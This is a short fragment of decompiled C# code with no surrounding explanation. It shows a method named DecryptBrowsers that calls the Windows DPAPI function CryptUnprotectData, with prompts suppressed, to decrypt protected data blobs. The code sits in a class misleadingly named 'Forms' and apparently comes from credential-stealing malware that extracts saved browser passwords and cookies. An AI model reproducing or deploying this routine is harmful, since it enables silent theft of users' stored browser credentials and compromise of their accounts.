// Token: 0x06000026 RID: 38 RVA: 0x0000309C File Offset: 0x0000129C public static byte[] DecryptBrowsers(byte[] cipherTextBytes, byte[] entropyBytes = null) { Forms.DataBlob dataBlob = default(Forms.DataBlob); Forms.DataBlob dataBlob2 = default(Forms.DataBlob); Forms.DataBlob dataBlob3 = default(Forms.DataBlob); Forms.CryptprotectPromptstruct cryptprotectPromptstruct = new Forms.CryptprotectPromptstruct { cbSize = Marshal.SizeOf(typeof(Forms.CryptprotectPromptstruct)), dwPromptFlags = 0, hwndApp = IntPtr.Zero, szPrompt = null }; string empty = string.Empty; try { try { if (cipherTextBytes == null) { cipherTextBytes = new byte[0]; } dataBlob2.pbData = Marshal.AllocHGlobal(cipherTextBytes.Length); dataBlob2.cbData = cipherTextBytes.Length; Marshal.Copy(cipherTextBytes, 0, dataBlob2.pbData, cipherTextBytes.Length); } catch (Exception) { } try { if (entropyBytes == null) { entropyBytes = new byte[0]; } dataBlob3.pbData = Marshal.AllocHGlobal(entropyBytes.Length); dataBlob3.cbData = entropyBytes.Length; Marshal.Copy(entropyBytes, 0, dataBlob3.pbData, entropyBytes.Length); } catch (Exception) { } Forms.CryptUnprotectData(ref dataBlob2, ref empty, ref dataBlob3, IntPtr.Zero, ref cryptprotectPromptstruct, 1, ref dataBlob); byte[] array = new byte[dataBlob.cbData]; Marshal.Copy(dataBlob.pbData, array, 0, dataBlob.cbData); return(array); } catch (Exception) { } finally { if (dataBlob.pbData != IntPtr.Zero) { Marshal.FreeHGlobal(dataBlob.pbData); } if (dataBlob2.pbData != IntPtr.Zero) { Marshal.FreeHGlobal(dataBlob2.pbData); } if (dataBlob3.pbData != IntPtr.Zero) { Marshal.FreeHGlobal(dataBlob3.pbData); } } return(new byte[0]); }
private static extern bool CryptUnprotectData(ref Forms.DataBlob pCipherText, ref string pszDescription, ref Forms.DataBlob pEntropy, IntPtr pReserved, ref Forms.CryptprotectPromptstruct pPrompt, int dwFlags, ref Forms.DataBlob pPlainText);